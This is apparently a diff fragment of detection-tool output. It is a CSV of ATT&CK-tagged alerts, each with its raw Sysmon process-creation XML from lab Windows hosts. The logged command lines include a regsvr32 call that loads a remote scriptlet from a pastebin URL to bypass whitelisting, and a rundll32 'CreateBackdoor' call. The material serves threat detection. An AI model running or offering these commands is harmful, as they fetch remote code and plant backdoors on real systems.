+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
+    </TimeCreated>
+    <EventRecordID>16116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
+    <Data Name=""ProcessId"">2544</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
+    <Data Name=""ParentProcessId"">3212</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
+    </TimeCreated>
+    <EventRecordID>16116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
+    <Data Name=""ProcessId"">2544</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
+    <Data Name=""ParentProcessId"">3212</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
+    </TimeCreated>
+    <EventRecordID>16792</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1880"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
+    <Data Name=""ProcessId"">1420</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
+    <Data Name=""LogonId"">0x13eee</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
+    <Data Name=""ParentProcessId"">3528</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-16T16:08:40.360593Z"">
+    </TimeCreated>
+    <EventRecordID>18918</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1744"" ThreadID=""2120"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
+    <Data Name=""UtcTime"">2019-05-16 16:08:40.350</Data>
+    <Data Name=""ProcessGuid"">DFAE8213-8B08-5CDD-0000-001011CE0A00</Data>
+    <Data Name=""ProcessId"">3764</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">DFAE8213-832F-5CDD-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47</Data>
+    <Data Name=""ParentProcessGuid"">DFAE8213-8B02-5CDD-0000-00109BCA0A00</Data>
+    <Data Name=""ParentProcessId"">1720</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\osk.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\osk.exe&quot;  </Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
+    </TimeCreated>
+    <EventRecordID>16792</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1880"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
+    <Data Name=""ProcessId"">1420</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
+    <Data Name=""LogonId"">0x13eee</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
+    <Data Name=""ParentProcessId"">3528</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
+    </TimeCreated>
+    <EventRecordID>16792</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1880"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
+    <Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
+    <Data Name=""ProcessId"">1420</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
+    <Data Name=""LogonId"">0x13eee</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
+    <Data Name=""ParentProcessId"">3528</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
+    </TimeCreated>
+    <EventRecordID>243538</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
+    <Data Name=""ProcessId"">2536</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-13T00:28:16.122541Z"">
+    </TimeCreated>
+    <EventRecordID>148597</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2756"" ThreadID=""3632"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-13 00:28:16.115</Data>
+    <Data Name=""ProcessGuid"">747F3D96-3F20-5EBB-0000-0010035E3600</Data>
+    <Data Name=""ProcessId"">8052</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-3821-5EBB-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-3821-5EBB-0000-001040690000</Data>
+    <Data Name=""ParentProcessId"">732</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
+    </TimeCreated>
+    <EventRecordID>243538</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
+    <Data Name=""ProcessId"">2536</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T00:35:07.474160Z"">
+    </TimeCreated>
+    <EventRecordID>376</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 00:35:07.386</Data>
+    <Data Name=""ProcessGuid"">365ABB72-47BB-5CE3-0000-00108CAD3E00</Data>
+    <Data Name=""ProcessId"">3176</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c pause</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-47BB-5CE3-0000-0010BFA83E00</Data>
+    <Data Name=""ParentProcessId"">1912</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Downloads\com-hijack.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\com-hijack.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
